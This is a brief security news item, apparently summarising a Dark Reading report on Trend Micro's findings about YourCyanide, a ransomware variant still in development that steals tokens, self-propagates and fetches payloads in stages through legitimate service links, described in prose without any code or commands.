"YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links"

A new CMD-based ransomware variant is still under development, but researchers at Trend Micro warn that its poisonous combination of multiple layers of obfuscation and the sneaky integration of legitimate service links into its attack make it a potentially formidable threat.  YourCyanide traces its roots back to the GonnaCope ransomware family first discovered in April.  The researchers noted that it doesn't actually encrypt anything yet (researchers say that's likely coming soon), but it does rename all targeted files, steal information, and pilfer access tokens from popular applications like Chrome, Discord, and Microsoft Edge.  It also self-propagates.  The researchers stated that YourCyanide includes a few new tactics, including using PasteBin, Discord, and Microsoft links to download its payload in stages, and it now hides behind Enable Delayed Expansion functionality.  The researchers noted that while YourCyanide and its other variants are currently not as impactful as other families, it represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework.  The researchers stated that it is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage.

Dark Reading reports: "YourCyanide Ransomware Propagates With PasteBin, Discord, Microsoft Links"